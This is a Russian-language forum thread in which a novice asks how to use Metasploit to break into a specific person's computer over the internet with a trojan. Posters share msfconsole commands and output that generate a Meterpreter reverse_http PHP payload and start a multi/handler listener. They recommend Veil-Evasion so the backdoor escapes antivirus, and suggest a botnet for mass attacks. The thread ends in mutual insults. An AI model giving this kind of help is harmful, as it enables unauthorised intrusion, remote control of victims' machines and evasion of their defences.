Прошу не судить строга и не кидать камни, только учусь! Недавно познакомился с metasploit и с Exploit. exploit/windows/smb/ms08_067_netapi для Windows XP хорошо подходит. Больший интерес привлек exploit/multi/handler т.к он позволяет проникнуть через троян по определенному порту в локальной сети. Что требуется и в чем вопрос?! Хочу найти подобный эксплойт этому который функционирует в ИНТЕРНЕТ сети. Какой эксплойт лучше использовать для таких нужд ? Где копать информацию по нужному exploit? Code: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST ***.***.*.* set LPORT **** exploit Буду очень благодарен за информацию по данной теме! Знания по metasploit, armitage, cobalt strike в стадии зародыша.
Генерируете нагрузку, например, таким образом: Code: msf exploit(handler) > use payload/windows/meterpreter/reverse_http ... generate -f ololo.php -t raw Соединение принимаете следующим образом: Code: msf payload(reverse_tcp) > use exploit/multi/handler ... run Информации по метасплоиту полно в интернете.
Code: msf exploit(handler) > use exploit/multi/handlerInterrupt: use the 'exit' command to quit msf exploit(handler) > use payload/windows/meterpreter/reverse_http msf payload(reverse_http) > set LHOST 192.168.1.28 LHOST => 192.168.1.28 msf payload(reverse_http) > set LPORT 4444 LPORT => 4444 msf payload(reverse_http) > generate -f ololo.php -t raw [*] Writing 324 bytes to ololo.php... msf payload(reverse_http) > use exploit/multi/handler msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > set LHOST 192.168.1.28 LHOST => 192.168.1.28 msf exploit(handler) > run [*] Started reverse TCP handler on 192.168.1.28:4444 [*] Starting the payload handler... ??? Всё тоже самое нужно повторить с атакой на компьютер в другой сети. Как понимаю для этого используется другой Еxploit. Наведите на путь истинный.
Если Вам нужна php-нагрузка для всех ресурсов, то генерируете ее один раз и настраиваете хэндлер на мультиприем.
Можно поступить по другому, т.к. создание троя в metasploit палится вирями. Он лучше подойдёт для ловли shell, а создание бэкдора сделай в veil-evasion и не палится и хороший выбор языков
veil-evasion veil-evasion Очень хорошо подходит для конпиляции. Меня интересует способ проникновения, а не компиляция трояна. Мне очень интересен способ и подходящий эксплойт для этого. Тот способ который показан, работает внутри сети, а мне интересен способ который работает по ip адресу в интернет пространстве.
Как Вам по подробней описать ситуацию?! Приставим ситуацию!!! Есть человек с ip адресом: 145.255.181.238 я могу передать этом человеку файл) сделанный с помощью veil-evasion. Какой exploit лучше использовать и как? Как это примерно выглядит? Что прописывать в show options? Как лучше с компелировать файл через veil-evasion? Очень интересно увидеть процесс запуска эксплойта! Я понимаю это звучит очень глупо. На компьютере жертвы нет хорошего фаервола и есть возможность его отключить.
Я не юзал veil, поэтому посоветовать конкретного ничего не могу. Можно помощь почитать https://github.com/Veil-Framework/Veil-Evasion или видосы посмотреть. Ну я думаю принцип примерно одинаковый - запустить у себя на прослушивание meterpreter а бинарник, зашифрованный вейлом запустить на целевом компьютере и ждать пока произойдет бек-коннект, ну или что там нагрузка должна делать. В ютубе ролики, по идее должны быть. Посмотрите, поинтересуйтесь, я думаю все не так сложно но и с пол-пинка тоже не получится. Успехов!
Спасибо вам огромное за трату времени. Вот подкинули бы вы еще материала чтоб почитать и посмотреть по этой теме!
Я бы подкинул, но сам давно msf не юзал. Я же говорю, на ютубуе полно видосов, да и потом можно на форуме rapid7 все поспрашивать. В общем тут в основном - самостоятельная работа. Ну или кто из олдфагов подскажет.
Четно сказать не особо понимаю что тебе надо??? Ведь veil и blind and reverse_tcp если ты работаешь на одного человека, а если массово то тебе нужен ботнет. ищи их много допиливай и учи языки программирования.
Ведь ты описал ситуацию которую хочешь реализовать то тебе то что сказал самое то, если не понимаешь о чем говоришь лучше учи, а потом спрашивай.
Не понимаю что тут такого сложного, возьми забей в поиск на ютубе и посмотри. Кстати у Клевогина самые крутые видосы для школоты... Вот посмотри тут Если уж и его не поймешь то думаю тогда не когда не до прешь.... Но как народ выше и сказал читай всю документацию на Rapid7 там много манов по различным векторам атак.
Иди батники учись писать понтарез не доделанный. Сверху четко и ясно написано интересует наглядный ПРИМЕР И ПРОЦЕСС атаки на ПК по ip адресу с помощью трояна и метасплоита. Как сгенерировать троян и запустить метасплоит я и так понимаю.
Да тебе самому батники учить пора дятел. если ты знаешь как работать с метасплоит хули тогда тут вопросы такие задаешь питушинные.